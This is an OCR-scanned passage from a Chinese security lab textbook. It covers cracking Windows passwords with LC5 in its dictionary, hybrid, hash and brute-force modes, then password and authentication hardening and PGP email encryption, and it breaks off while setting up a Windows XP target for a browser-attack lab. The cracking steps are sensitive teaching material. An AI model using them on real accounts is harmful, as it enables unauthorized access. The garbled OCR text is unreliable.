试 ,由 于 口令 复杂 了 一 些 , 破 解 方 法 选择 “普通 口令 破解 ”, 测 试 结果 如 图 10. 1. 10 所 示 。 
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图 10110 口令 为 security 的 破解 结果 
可 以 看 到 ,口令 security 也 被 破解 出 来 ,只 是 破解 时 间 稍 微 有 点 长 而 已 。 


图 10.1.11 所 示 。 





把 口令 设置 得 更 加 复杂 一 些 , 改 为 security123, 选择 “普通 口令 破解 ”, 测 试 结果 如 


可 以 看 到 ,普通 口令 破解 并 没有 完全 破解 成 功 ,口令 的 最 后 几 位 没有 破解 出 来 ,这 时 应 


图 10.1.12 所 示 。 


该 选择 复杂 口令 破解 方法 ,因为 这 种 方法 可 以 把 字母 和 数字 进行 尽 可 能 地 组 合 , 破 解 结果 如 


«T 
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图 10112 复杂 口令 破解 


可 以 看 到 ,复杂 口令 破解 速度 虽 慢 ,但 把 比较 复杂 的 口 
令 security123 破解 出 来 了 。 其 实 还 可 以 设置 更 加 复杂 
的 口令 ,采用 更 加 复杂 的 自 定义 口令 破解 模式 ,设置 界 
面 如 图 10. 1. 13 所 示 。 
其 中 ,如 果 选 择 “ 字 典 攻击 ”, 可 以 选择 字典 列表 中 
的 字典 文件 进行 破解 ,LC5 本 身 带 有 简单 的 字典 文件 ， 
也 可 以 自己 创建 或 者 利用 字典 工具 生成 字典 文件 ;* 混 
合 字 典 ? 破 解 口令 是 把 单词 ,数字 或 符号 进行 混合 组 合 
破解 预定 散 列 ?破解 是 利用 预先 生成 的 口令 散 列 值 
fil SAM 中 的 散 列 值 进 行 匹 配 , 这 种 方法 由 于 不 用 在 线 
计算 Hash 而 速度 很 快 ; 利 用 "暴力 破解 ”中 的 字符 设置 
选项 ,可 以 设置 为 “字母 十 数字 ”“ 字 母 十 数字 十 普通 
号 ”“ 字 母 十 数字 十 全 部 符号 ”, 这 样 从 理论 上 就 可 
Dhan BAT SHEILA TIRE CS ER HG 只 是 破解 
时 间 可 能 很 长 。 
2. 掌握 安全 的 口令 设置 策略 
暴力 破解 理论 上 可 以 破解 任何 口令 .但 如 果 口 令 
过 于 复杂 ,暴力 破解 需要 的 时 间 会 很 长 (比如 几 天 ) ,在 
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自 定义 破解 选项 
Iv 使 用 “字典 攻击 ”破解 口令 
e SEN 


EEAERCO AIUSECMTE » 点 击 这 
文件 : 


字典 列表 
Iv 使 用 “混合 字典 ”破解 口令 
goai 对 字典 中 的 每 个 单词 、 数 字 或 罕 


Iv 使 用 “预定 散 列 ”破解 口令 
e 
中 查找 相同 字符 的 口令 。 
此 破解 方法 只 对 Windows LI 认证 口令 有 效 . 
获 列 文件 列表 
Iv 使 用 “暴力 破解 ”破解 口令 


payee 


LITT 
图 10113 自 定义 破解 





这 段 较 长 的 时 间 内 ,增加 了 用 户 发 现 人 侵 和 破解 行为 的 机 会 ,以 采取 某 种 措施 来 阻止 破解 ， 
所 以 口令 的 复杂 度 越 大 越 好 。 一 般 设置 口令 要 遵循 以 下 几 个 原则 : 

(1) 口令 长 度 不 小 于 8 个 字符 。 

(2) 包含 大 写 和 小 写 的 英文 字母 、 数 字 和 特殊 符号 的 组 合 。 

(3) 不 包含 姓名 ,用户 名 .单词 .日 期 以 及 这 几 项 的 组 合 。 

(4) 定期 修改 口令 ,并 且 对 原 有 口令 做 较 大 的 变动 。 

例如 ,974a3K%n_4$Frl# 就 是 一 个 复杂 度 很 高 的 口令 ,破解 软件 要 花费 很 长 的 时 间 
才能 破解 。 

3. 密码 破解 的 防护 

syskey 是 Windows 2000 和 Windows XP 中 增加 的 一 项 功能 , 它 可 以 使 用 启动 密 钥 来 
保护 SAM 中 的 账号 信息 。 默 认 情 况 下 ,启动 密 钥 是 一 个 随机 生成 的 密 钥 ,存储 在 本 地 计算 
机 上 。 这 个 启动 密 钥 在 计算 机 启动 后 必须 正确 输入 才能 登录 系统 。 通 过 在 命令 行 界面 下 输 
人 命令 syskey, 回 车 后 即 会 启动 syskey 的 设置 界面 ,如 图 10.1. 14 所 示 。 

通过 syskey 保护 ,攻击 者 即使 通过 另外 一 个 操作 系统 挂 上 被 攻击 者 的 硬盘 , 偷 走 被 攻 
击 者 计算 机 上 的 一 个 SAM 的 副本 ,这 份 SAM 副本 对 于 攻击 者 也 是 没有 意义 的 ,因为 
syskey 提供 了 非常 好 的 安全 保护 。 当 然 , 要 防止 攻击 者 进入 系统 后 对 本 地 计算 机 启动 密 钥 
的 搜索 ,这 可 以 通过 在 配置 syskey 时 将 启动 密 钥 存储 在 软盘 上 实现 启动 密 钥 与 本 地 计算 机 
的 分 隔 。 

另外 ,还 可 以 通过 选择 安全 的 身份 验证 协议 ,防止 嗅 探 器 探测 到 网 络 中 传输 的 密码 。 在 
Windows 2000 fil Windows XP 中 ,默认 的 身份 认证 协议 是 Kerberos v5, 它 采用 了 复杂 的 加 
密 方 式 来 防止 未 经 授权 的 用 户 截获 网 络 中 传输 的 密码 信息 。 但 是 ,如 果 计 算 机 没有 加 入 到 
域 中 ,它们 采用 的 身份 认证 协议 是 NTLM, NTLM 采用 询问 应 答 的 方式 进行 身份 验证 , 它 
有 3 种 变 体 : LM(LAN Manager), NTLMv1 和 NTLMv2。 其 中 NTLMv2 是 最 安全 的 身 
份 验证 方式 。 为 了 加 强 网 络 安全 性 ,需要 关闭 LM 和 NTLMvl 这 两 种 相对 不 安全 的 方式 。 

可 以 通过 “控制 面板 ”>“ 管 理工 具 ” 一 “本 地 安全 策略 ”, 在 本 地 安全 策略 窗口 中 打开 安全 
设置 \ 本 地 策略 \ 安 全 选项 ,在 右 侧 的 窗口 中 ,双击 打开 “网 络 安全 : LAN Manager 身份 验证 
级 别 属性 ”对 话 框 ,在 列表 中 选择 “ 仅 发 送 NTLMv2 响应 \ 拒 绝 LM&.NTML”, 如 图 10. 1. 15 
所 示 。 





[ LAN Manager 身份 验证 级 别 属性 (2) 
FRESE | 
保证 Windows XP 账户 数据 库 的 安全 区 | E FASS: LAN Manager 身份 验证 级 别 


By X 2 s Pees 








= N2 响应 \ 拒 绝 LN è NTL 司 
A [as 置 可 能 影响 与 客户 端 、 St 
有 ; 安全 LAN Manager 
的 更 多 信息 。 (q323659) 
ce [= (E 
ma | suo | Caz ES 


10114 syskey 配 置 界面 图 10115 身份 认证 协议 的 选择 界面 





一 旦 启用 这 个 加 密 就 不 能 禁用 。 
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在 Windows 系统 里 面 有 很 多 措施 可 以 用 来 增强 口令 的 安全 ,详细 步骤 和 过 程 请 参考 


9.1 节 Windows 操作 系统 安全 实验 中 的 账户 和 口令 安全 设置 。 
10.2 安全 加 密 电邮 实验 


实验 器 材 
PGP 电子 加 密 邮 件 、.Foxmail(Outlook) 邮 件 客户 端 ,1 套 。 
PC,1 G. 
预习 要 求 


(1) 做 好 实验 预习 ,复习 安全 加 密 电 邮 技 术 的 有 关内 容 。 
(2) 熟悉 PGP 软件 的 使 用 方法 。 

(3) 熟悉 Outlook 软件 的 使 用 方法 。 

(4) 熟悉 实验 过 程 和 基本 操作 流程 。 

(5) 做 好 预习 报告 。 


实验 任务 


了 解 PGP 加 密 的 原理 ,掌握 PGP 软件 的 使 用 方法 ,对 加 密 产 生 直 观 认识 ;了 解 安全 电 


子 邮件 的 使 用 方法 ,加 深 对 数字 证 书 及 其 在 安全 领域 中 的 广泛 应 用 的 理解 。 
实验 环境 


硬件 : 安装 Windows 2000 Server 的 计算 机 、 邮 件 服务 器 ( 公 网 ) 。 
软件 : PGP 电子 加 密 邮件 .Foxmail(Outlook) 邮 件 客户 端 等 。 


预备 知识 


COD 深入 理解 PGP 的 工作 过 程 (只 认证 、 只 加 密 、 认 证 和 加 密 ) 以 及 与 加 密 相 关 的 操作 。 


(2) 熟练 掌握 Outlook 软件 收发 邮件 的 操作 。 
实验 步 又 
1. PGP 的 安装 以 及 创建 密 钥 对 (版 本 PGPfreeware_6. 5.3) 


运行 安装 程序 PGPfreeware 6.5. 3. exe, 前 面 的 安装 界面 和 大 部 分 的 Windows 程序 相 
同 。 根 据 提示 单 击 Next 按钮 即 可 。 在 安装 过 程 中 ,系统 会 询问 是 否 已 经 拥有 “ 密 钥 对 ”。 


图 10. 2.1 一 图 10. 2. 6 为 安装 的 过 程 。 
PGP 的 安全 性 依赖 于 用 户 的 私 钥 是 否 安全 ,如 果 用 户 的 私 钥 不 小 心 泄露 出 去 ,PGP 


就 毫 无 安全 性 可 言 了 。 私 钥 越 长 ,PGP 的 安全 性 也 就 越 高 。 因 此 一 般 人 是 不 可 能 去 记 住 它 


也 





的 。Passphrase 就 是 用 来 保护 “ 密 钥 ”的 密码 。 当 PGP 需要 使 用 用 户 的 私 钥 时 ,会 提示 用 户 


输入 Passphrase。 
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图 1021 进入 程序 环境 


Key Generation Wizard 


What name and email address should be associated with this key 
pai? 


By listing your name and email address here, you let your 
correspondents know that the key they are using belongs to you. 


Eul name: 
[husnaie 





Email address: 
[huenaie 2000163 com 





mm | "mj 
1022 输入 名 称 和 邮件 地 址 





Key Generation Wizard 


What type of key would you like to generate? If you don't know, 
it's recommended that you generate a Diffie Hellman/DSS key 
pair. 


RSA is the "old-style" PGP key. Most new users of PGP will be 
expecting a Diffie Hellman/DSS key. 


If you'd like more information on the differences between the two 
key types, press the Help button, below. 





ma |__| 
图 1023 选择 密 钥 产生 方式 
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Key Generation Wizard 


How large a key pair do you wish to generate? As a rule, larger 
keys ate more secure. but slower. 
For most applications, 1024 - 2048 bit keys are quite sufficient. 


- Key Pair Size 


C 1024 bits 
1536 bits (1536 Diffie-Hellman/1024 DSS) 


3072 bits (3072 Diffie Hellman/1024 DSS) 
C Custom (1024 - 4096 bits) 


m 





《上 一 步 @) [r—5 o >] 取消 帮助 
图 1024 选择 密 钥 对 的 长 度 





Key Generation Wizard 





You can set your key pair to automatically expire within a certain 
amount of time. 


When your key pair expires, you wil no longer be able to use it for 
encrypting or signing. However, it wil stil decrypt and verity. 


Once you generate your key pair, you will not be able to change 
its expiration setting. 


Key Expiration 


C Key pair never expires 


(* Key pair expires on [2008- 4-26 v 





p Tl pes 
图 1025 选择 密 钥 对 的 有 效 期 限 


Key Generation Wizard 





Your private key will be protected by a passphrase, Itis important 
that you do not write this passphrase down. 


‘Your passphrase should be at least 8 characters long and should 
contain non-alphabelic characters 


Passphrase: Ív Hide Typing 





Passphrase Quality 





《上 一 步 中 取消 帮助 














图 1026 输入 Passphrase 


Passphrase 非常 重要 ,建议 大 家 的 Passphrase 尽量 长 些 , 并 且 包 含 非 字 母 元 素 ,以 免 被 
黑客 用 穷 举 法 破解 。 

根据 提示 单 击 “ 下 一 步 ” 按 钮 , 密 钥 对 就 创建 完成 了 。 新 的 密 钥 对 会 出 现在 PGPkeys 
中 ,如 图 10. 2.7 所 示 。 

如 果 由 于 某 些 意外 原因 ,比如 硬盘 损害 或 者 系统 崩溃, 那么 ,所 有 加 密 过 的 文件 和 数据 
就 再 也 无 法 找 回 来 了 。PGP 推荐 使 用 者 备份 自己 的 密 钥 , 以 防 意 外 ,如 图 10. 2. 8 所 示 。 








* PGPkeys BEE] 
Hile Edit View Keys Server Groups Help 


Sx ALED SE 
| val... | Trust [Size |Description ^ 


5 OP Ann Campi Cacampi@nai. com> CC 2048/1024 DH/DSS publi 

m O Bill Blanke > 4096/1024 DH/DSS publi 

(© Chanda Groom <chanda_groom@nai CC 2048/1024  DM/DSS publi 一 

HO Damon Gallaty <deal@pep. com> ——, 3072/1024  DW/DSS publi The new key that has been generated during this session is 


——E ze Losing your keyring fle in a disk crash or 
BD Yhuangjie <huangjie 200001 €o femme 2048/1024 DH/DSS key vou heon 
SiGe] huangjie Chuengjie 20008163. ser accidental fle deletion without having a backup wil render the 


Certe Pelei 
内 huangjie huangjie 20008 


mO Jason Bobier jasonüpgp. com> 2059/1024 — DH/DSS publi eit deed ies backup your keyring files 
mO Katherine Massucci Pettit <onp. 2048/1024 DH/DSS publi gj. 

FI m is 

1 key(s) selected 








图 1027 密 钥 对 创建 完毕 图 1028 备份 密 钥 


2. An 

别人 要 发 送 加 密 信件 给 你 ,必须 首先 要 得 到 你 的 公开 密 钥 (简称 公 钥 ) ,然后 用 此 公 钥 来 
加 密 , 所 以 要 发 布 自己 的 公 钥 ,知道 你 的 公 钥 的 人 越 多 ,能 够 给 你 发 送 加密 信 件 的 人 也 就 
越 多 。 

公 钥 的 发 布 方 式 一 般 有 两 种 ,直接 将 公 钥 交 给 朋友 ,或 者 通过 一 个 公共 的 公 钥 管理 机 构 
发 布 公 钥 ,所 有 想 要 给 你 发 信 的 人 都 可 以 从 这 个 公 钥 管理 机 构 下 载 你 的 公 钥 。 

如 果 采 用 第 一 种 方法 发 布 公 钥 ,首先 必须 制造 公 钥 文件 以 便利 用 网 络 传播 给 其 他 人 , 制 
造 方法 是 在 PGPkeys 中 选择 菜单 Key>Export… ,导出 一 个 公 钥 文件 ,例如 yourname. asc. 
这 个 . asc 文件 就 是 公 钥 ,只 要 将 它 安 全 地 交 给 朋友 就 可 以 了 。 

发 布 公 钥 最 好 的 方式 就 是 上 载 到 Key Server, PGP 内 置 了 两 个 比较 著名 的 Key 
Server, 可 以 任 选 一 个 。 在 PGPkeys 中 选择 公 钥 ,再 选择 菜单 Server Send to 即 可 ,如 
图 10.2.9 所 示 。 

3. 获取 公 钥 

获取 其 他 人 的 公 钥 也 有 两 种 方法 : 直接 索取 或 者 在 Key Server 上 搜索 得 到 。 

先 说 第 一 种 方法 , 当 得 到 别人 的 公 钥 文件 时 ,选择 菜单 Key Import 将 其 导入 即 可 。 

如 果 对 方 的 公 角 发布 在 Key Server 上 ,那么 , 公 钥 的 获得 更 加 方便 。PGP 的 Key Server 
提供 了 一 个 非常 好 用 的 公 钥 搜索 引擎 。 选 择 菜 单 Server 一 Search, 输 入 需要 的 公 钥 名 称 即 
可 ,如 图 10. 2. 10 所 示 。 

在 搜索 的 结果 中 选择 需要 的 公 钥 , 右 击 ,在 快捷 菜单 中 选择 Export 命令 ,可 以 导出 普通 
的 公 钥 文件 ,然后 再 导入 到 PGPkeys 中 即 可 ,如 图 10.2. 11 所 示 。 

导出 所 需要 的 公 钥 后 ,双击 打开 该 公 钥 ,出 现 如 图 10. 2. 12 所 示 的 对 话 框 , 再 单 击 
Import 按钮 将 公 钥 导入 到 自己 PGPkeys 的 列表 中 。 
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Domain Server 


ldap: //certserver. pep. con 

mO Ann Campi <acampil 

m OP Bill Blanke (jd — — — 5 — — 0. 

@ Chanda Groom (cha Update Reyocations 2048/1024 — DW/USS public key 

3072/1024  DW/USS public key 
2048/1024 — DW/USS key pair 

2048/1024 DH/DSS public key 


Retrieve Certificate 


mA huangjie 2005 huangjiebuptBlE 
mO huangjiebupt <husngji ebupt@163 
Sm <huangjie 200081 
SE huangjie <huangjie 20008163. 
A, huangjie huanejie 20008 
m Jason Bobier Cjasonüpgp. com> 
Katherine Massucci Pettit <mp. 
Marc Dyksterhouse <marcd@pep. com> 
Mark J. MeArdle (marknpgp. com> 
Michael K. Jones <njones@nai. com> 
Myles Monroe <nmonroe@nsi. com> 
Network Associates PGP Softwar 


User ID 

DSS exportable signatu 
2059/1024 DH/DSS public key 
2048/1024 DH/DSS public 
2048/1024 DH/DSS public 
2048/1024 DH/DSS public 
2045/1024  DW/DSS public 
2048/1024 DH/DSS public 
1024 DH/DSS public 


'OOOOOOO OOH 











7 PGPkeys Search Window 


Search for keys on | http://pgpkeys.mit edu 11371 v| where 


[UserID | [contains =] [Damon Gallty 
More Choices | £ 
Ke 


m Davon Gallaty <dgel@pep 1024 

HO Damon Gallaty dgalüpgp. con? 3oT2/1024  DM/DSS |- 
mO Damon Gallaty dgslüpgp 2048/1004 — DW/USS 
HO Danon Gallaty <dgal@pep 2048/1024  DW/DSS gj 




















9 PGPkeys Search Window 


Search for keys on [http://pgpkeys.mtedu11371 — T] where 


[UserID =] [contains z] [damon gallaty 


More Choices | Fewer Choice 


Keys Description 








HR Davon Gallaty Cgal@ead gatech =] Revoked RSA public key 
5 99 Danon Gallaty <dgal@pep. com> RSA public key 


田 Damon Gallaty 2048/1024 
HO Damon Gallaty Paste 2048/1024 DH/DSS public key 


Import to Local Keyring 


Send to 


Key Properties 











gf'| 1 key(s) selected 





图 10211 导出 公 钥 


:9 Select key(s) 


Select the key(s) you would like to import to your keyring : 





024 DH/DSS public key 








图 10212 导入 公 钥 


4. 文件 加 密 解密 

假设 要 加 密 一 个 Word 文档 encryption test. doc。 在 该 文件 上 右 击 ,选择 PGP 后 弹出 
一 个 窗口 ,共有 Encryp、Sign、Encrypt and sign 和 Wipe 4 个 选项 ,其 中 ,Encryp 表示 加 密 ， 
Sign 是 签名 ,Encrypt and sign 是 加 密 和 签名 的 组 合 , Wipe 是 将 文件 删除 。 

选择 Encryp, 弹 出 密 钥 选择 对 话 框 , 如 图 10. 2. 13 所 示 。 


- Key Selection Dialog 


2048/1024 
4096/1024 
| groonBnai. com> 2048/1024 
— €—— Áo wet —X 
| 20008183, co? —— Q9 2046/1024 
[zlJason Bobier <jason@pgp. com> 2059/1024 
2059/1024 
2059/1024 
du) 2059/1024 


faso: ] 
[Recipients — — 5 8$ 5 — 5 va... [ sie | 
[z]huangjie 2005 QhuangjiebuptB163. com> @ 2048/1024 


[^ Text Output ope | He | 


[^ Wipe Original 
[^ Conventional Encryption 
[7 Self Decrypting Archive 





图 10219 密 钥 的 选择 对 话 框 


Recipients 表示 收 件 人 ,也 就 是 我 们 选择 的 加 密 公 钥 。 加 密 后 的 文件 只 有 收 件 人 使 用 
其 私 钥 才 能 打开 ,所 以 ,一般 不 要 选择 Wipe Original( 删 除 原 文件 )。 如 果 只 是 想 加 密 文件 ， 
以 防止 被 别人 窃取 , 则 可 以 使 用 自己 的 密 钥 加 密 , 这 样 ,只 有 你 自己 才能 打开 文件 。 

生成 的 加 密 文件 以 . pep 结尾 , 右 击 加 密 文件 ,在 菜单 中 选择 PGP— Decrypt, PGP 程序 
自动 提取 出 其 中 的 公 钥 ,并 提示 用 户 输入 私 钥 的 “Passphrase”( 见 图 10. 2. 14) ,检验 通过 后 ， 
还 原 为 原始 文件 。 但 是 ,PGP 在 处 理 中 文 时 并 不 是 很 理想 .中文 文件 名 在 还 原 时 有 时 不 能 
正常 显示 。 

5. 数字 签名 

签名 方法 也 和 加 密 一 样 。 选 择 菜单 中 的 Sign, 弹 出 签名 窗口 ( 见 图 10. 2.15), 
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PGPshell — Enter Passphrase 


PGPshell — Enter Passphrase EJ 
Message was encrypted to the following public key(s] EM 
Signing key: [huangjie <huangie_2000@163.com> (DSS/1024) X 


huangie_2005 <huangiebupt@163.com>... [DH/2048] 
IV. Hide Typing 


Enter passphrase for above key 


Enter passphrase for your private key : 
Caros 


[V Detached Signature 
[7 Text Output 





图 10214 输入 密码 的 Passphrase 图 10215 数字 签名 


如 果 选 择 Detached Signature. PGP 会 为 原始 文件 产生 一 个 单独 的 签名 文件 ,以 . sig 结 
尾 。 也 可 以 右 击 原始 文件 ,在 快捷 菜单 中 选择 PGP— Verify Signature 命令 ,PGP 程序 自动 
显示 出 验证 结果 ( 见 图 10. 2. 16) 。 

















进行 验证 ,3 
PGPlog 
[encryption tes... huangjie oaio oT 2005-9-30 11:33 EN 
Ê encryption tes... huangjie <huangjie 200081 2005-9-30 11:33:58 
图 10216 数字 签名 验证 结果 
6. 利用 PGP 发 送 数字 签名 邮件 


可 以 将 文件 进行 签名 后 ,作为 附件 发 给 对 方 , 也 可 以 直接 对 邮件 正文 进行 签名 
名 邮件 和 发 送 普 通 邮件 是 一 样 的 。 
首先 使 用 邮件 用 户 代理 完成 邮件 的 编写 ,示例 中 使 用 的 是 Foxmail, 如 图 10. 2. 17 


所 示 。 
® 写 邮 件 (huangjiebupt@163. com) 
MEO MO REO FAO HSO ENO TAO =a - 
28 84CU y2. 
RE MRNA AF Miet 邮件 头 | RR 检查 地 址 -更 改 帐户 


收 件 人 :|haangjiebuptel63. com E 
we: | 


huangjiebupt， 您 好 ! 
这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 如 何 对 邮件 进行 数字 签名 。 








sx 


au! | 


huangjie 


huangjie 20008163. com 


2005-09-30 





图 10217 用 于 试验 的 一 封 电子 邮件 
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在 工具 托盘 的 PGPtray 的 图 标 上 右 击 ,在 快捷 菜单 中 选择 Current Window—Sign 命令 , 弹 
出 签名 窗口 ,填写 Passphrase, 即 可 得 到 一 封 经 过 签名 的 电子 邮件 ,如 图 10. 2.18 所 示 。 


Ó Sift (huangjiebupt@163. com) 
RO) HE) SEY BAD 格式 EF) 选项 @) IRW 
8329 CR Xe - 
发 送 ”特快 专递 保存 EL] 邮件 头 “| 拼写 检查 检查 地 址 更 改 帐户 
收 件 人 :huanajiebupta1l63. com E 
we [D 
[ougersgsaetet 


———-BEGIN PGP SIGNED MESSAGE———— 
Hash: SHAL 











huangjiebupt, (HF! 


这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 如 何 对 邮件 进行 数字 签名 。 
致 


huangjie 


2005-09-30 


-一 一 8ECIN PGP SICNATURE 一 一 一 
Version: PGPfreeware 6.5.3 for non-commercial use «http://www. pgp. com> 


iQA/AwUEQzxGLawZ*K61DTtgEQJPSQCgQ471iqFgQfTPRON11n/Z2gpJ8FblfAnRoK 
OAPLMFU jUHTVNuIeHPZ/vpno 
=810T 

END PGP SIGNATURE 


插入 





图 10218 经 过 签名 的 电子 邮件 


当 对 方 接收 到 签名 的 电子 邮件 后 ,直接 在 工具 托盘 的 PGPtray 图 标 上 右 击 ,在 快捷 菜 
单 中 选择 Current Window—Decrypt & Verify 命令 ,PGP 程序 经 过 验证 后 得 到 签名 者 信 
息 , 如 图 10. 2. 19 所 示 。 


Text Viewer 


|" PGP Signature Status: good 

一 Signer: huangiie <huangie_2000@163.com> 
一 Signed: 2005-9-30 11:53:16 

一 Veriied 2005-3-30 11:59:38 

一 BEGIN PGP VERIFIED MESSAGE 一 


Ihuangiebupt , f£ t 
这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 如 何 对 邮件 进行 数字 签名 。 


huangie 
huangie 2000G/153.com 
2005-09-30 


|'** END PGP VERIFIED MESSAGE ** 





图 10219 签名 验证 后 的 电子 邮件 
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7. 利用 PGP 发 送 加 密 和 签名 邮件 


首先 使 用 邮件 用 户 代 理 完 成 邮件 的 编写 ,示例 中 使 用 的 是 Foxmail, 如 图 10. 2. 20 
所 示 。 


会 SWF (huangjie_2000@163. com) 
BW REO 查看 W) MAD XQ) RO TAG 


EE e sie cee 





拼写 检查 检查 地 址 
[huangjie 20008163. con 
Pik: 
主题 : ER 





huangjie_2000， 您 好 ! 


这 是 一 封 测试 邮件 ， 用 来 测试 FEP 对 电子 邮件 的 加 密 和 签名 功能 。 
致 


huangjie 
huang jiebupt@163. com 
2005-10-08 





图 10220 用 于 试验 的 一 封 电子 邮件 


在 工具 托盘 的 PGPtray 图 标 上 右 击 ,在 快捷 菜单 中 选择 Current Window 一 Encryp &. 
Sign 命令 ,在 Key Selection Dialog 中 选择 收 信人 的 公 钥 。 也 可 以 选择 Clipboard->Encrypt & 
Sign 命令 ,但 是 ,要 首先 将 需要 加 密 的 内 容 复 制 到 剪贴 板 , 加 密 完成 后 再 用 剪贴 板 中 的 内 容 
替换 原 内 容 , 如 图 10. 2. 21 所 示 。 


æ PGPtray — Key Selection Dialog 


FeJAnn Campi <acanpi@nai. com> 2048/1024 
EBill Blanke <wjb@pep. com> 4096/1024 
[z]Chanda Groom (chanda groonünai. com> 2048/1024 
Fejhuangjie 2005 <huangjiebupt@163. com> 2048/1024 
Fejhuangjiebupt <huangji ebupt@163. com> 2048/1024 


[ejJason Bobier <jbobier@privnet. com> 2059/1024 
[=]Jason Bobier 4k0585098hobbes. kzoo. edu? 2059/1024 


Recipients E 
huangjie Qhuangjie 20008153. com> 2048/1024 





r— ome | Hep | 


[7 Conventional Encryption 





图 10221 选择 密 钥 
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加 密 完 成 后 ,加 上 自己 的 数字 签名 。 这 时 需要 输入 自己 私 钥 的 Passphrase, 如 图 10. 2. 22 
所 示 。 


PGPtray — Enter Passphrase 


Signing key - |huanoie <huangjie_2000@163.com> [DSS/1024] - 


Enter passphrase for above key: IV. Hide Typing 


= 


Lok | ee 


10222 数字 签名 





完成 后 ,邮件 正文 会 自动 被 密 文 所 蔡 换 。 如 图 10.2.23 所 示 。 单 击 “ 发 送 ” 按 钮 ,一 封 用 
收 信人 公 钥 加 密 后 的 PGP 邮件 就 完成 了 。 











会 Sift (huangjie_2000@163. com) 

| os "a SEU HAW sati imo IAW 
LA de 

OA: L3 34 30 9 90 04 

— —— — — — 

o TTA 0——— 


BEGIN PGP MESSAGE—— —— EJ 
Version: PGPfreeware 6.5.3 for non-commercial use «http://www. pgp. com> 











gANQR1DBwU4DNcSBskVwckQQB/ 4s gkBRxaLOAiPNyKI/oxPlMGsTOL]rz5qSTsskT 
nzluaYGVUnXCY7UiETRQS57rhZLB86V1]IbNaYxVpB]2n5MKgrZSugRdsU6]APOZUK 
E1GMORSd2zCCHVCc1cFddn07TE*a8N11Xb2YVrlgpeo jXnkOgP4dYgOSSN4anr4i 
f6o4QrZSpKFV57YqN1DSnCxXbYsYyNFvElfa2ScEvsmjl6fXlvLVtoCWUyVTIalb 
E4cNQh96bFCsKuLacnoKOPlPpQ8SkwK6YODo*rtFVVyRNEw*DBv36L1ZuTIupIlc 
FA jr96fgurdniVhqy*40h08N JU41VDFOGN3nCOt6Udxn / jNB/9ZQ2fEXdeHvASX 
ENBsRU2GIIw6yIc/DByDEo/nuxXDP75ni TwRR+SpN1+di xPGJXHO8ip6jZP1B196T 
WPZVxwNnAG4yswS8szVCi4xI*GCFc3VBOy7mvhMSxJarFuJ]jBmShXwrTA2NncLxs E 
gQBaC9q9xGr*3wBUNSOvI4GvOPY1METlrPONNLAXBEnkPH5xbi 83ZfQum+yK cEPmk 
YOlGnNOSLQ2MSG5rCu/G444yhGBad jyU*Zni t+Ry3Sollr4QEMJ£DtxDRIRK82f+o 
lhParrglJQVEexolyuj3o8GPJGnYcmtDExP /GOtCHRceNXLwuHtnlED]S3ObBVwn/ 
ocTp5pS/ycAvHkKZXiBEP5qXJUWZutSUkSSxdvLKH11QDoaNonNIWfEESNBacyllc 
j6co2WkLKZhge8X0w3eDfJyecZLvv1 Ki vTJYQvx jgNkY /0 jiruS9udFuNPULTOV 
SWFONdlQTMGdQOO0POTg4 jBdpFylAyHKpk6irXx918RilZQeM9EUAgtFeXqvaeyjyn 
9GtSNi9pMZtBtokwQBr8xSCZQinFqCuJuyXs 9YOQNLTRPi s ZQ3qW / aL8s5/Aqx64 
9HAg]n3SEKK2vOlzzztlESEnlMF9PsyBBRztQFPewE jSw4ivYZDPtIDwdp2Plt4zR 
PGiZEpQCHpk- 
oyH 





END PGP MESSAGE— — 











图 10223 加 密 后 的 邮件 正文 


当 收 到 一 封 加 密 的 电子 邮件 后 ,可 以 用 与 前 面相 同 的 方法 解密 ,如 图 10. 2. 24 和 
图 10. 2. 25 所 示 。 但 是 ,由 于 PGP 对 中 文 的 支持 不 是 很 好 ,因此 ,有 时 会 出 现 乱码 的 情况 。 
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PGPtray — Enter Passphrase 


Message was encrypted to the following public key(s] 
huangie <huangie_2000@163.com> [DH/2048] 





Enter passphrase for your private key : Ív Hide Typing 


[Le ] so | 
图 10224 输入 自己 私 钥 的 Passphrase 





Text Viewer 


一 PGP Signature Status: good 

"" Signer: huangiie <huangie_2000@163.com> 

=" Signed: 2005-10-8 9:38:51 

"" Verified. 2005-10-8 9:46:32 

"^ BEGIN PGP DECRYPTED/VERIFIED MESSAGE =" 


Ihuangiie 2000, ftt 
这 是 一 封 测试 邮件 ， 用 来 测试 PBF 对 电子 邮件 的 加 密 和 签名 功能 。 
E 


huangie 
huangiebupt@163.com 
2005-10-08 


=" END PGP DECRYPTED/VERIFIED MESSAGE 一 





图 10225 解密 结果 


实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
* 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 11 童 自动 化 浏览 器 攻击 实验 


11.1 Windows XP Professional SP3 靶 机 架设 


Windows XP 是 Microsoft 公司 推出 的 供 个 人 计算 机 (PC) (包括 商用 及 家 用 的 台式 计 
算 机 等 ) 使 用 的 操作 系统 ,其 名 字 XP 的 意思 是 英文 中 的 “体验 ”(experience) ,是 继 Windows 
2000 及 Windows ME .9X 之 后 的 下 一 代 Windows 操作 系统 ,也 是 Microsoft 公司 首 个 面向 
消费 者 上 且 使 用 Windows NTS. 1 架构 的 操作 系统 , 现 已 退役 。 


11.2 自动 化 浏览 器 攻击 实验 





实验 器 材 


PC,1 合 。 


Windows XP Professional SP3 系统 ,1 套 。 

预习 要 求 

理解 和 掌握 自动 化 浏览 器 攻击 原理 。 

实验 任务 

了 解 基本 的 静态 图 像 的 文件 格式 ,了 解 图 像 信息 隐藏 和 提取 的 基本 原理 、 分 类 和 方法 ， 
学 会 使 用 现 有 软件 工具 进行 图 像 信息 隐藏 操作 ,更 进一步 的 要 求 就 是 能 够 理解 软件 内 部 的 
基本 构造 。 

实验 环境 

安装 了 Windows XP Professional SP3 系统 的 PC。 

预备 知识 

自动 化 浏览 器 攻击 原理 。 

Se 

1. Windows XP Professional SP3 靶 机 的 安装 

(1) 从 网 上 下 载 Windows XP Professional SP3 英文 版 镜像 文件 ,保存 到 本 地 并 待 安装 
到 VMware 虚拟 机 中 。 


(2) 打开 VMware 虚拟 机 软件 ,出现 安装 向 导 窗口 ,通过 如 图 11. 2. 1 所 示 的 “新 建 虚拟 
机 向 导 ? 界 面 ,创建 一 个 新 的 虚拟 机 。 
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新 建 虚拟 机 向 导 





WORKSTATION 


PRO 
p 





欢迎 使 用 新 建 虚拟 机 向 导 


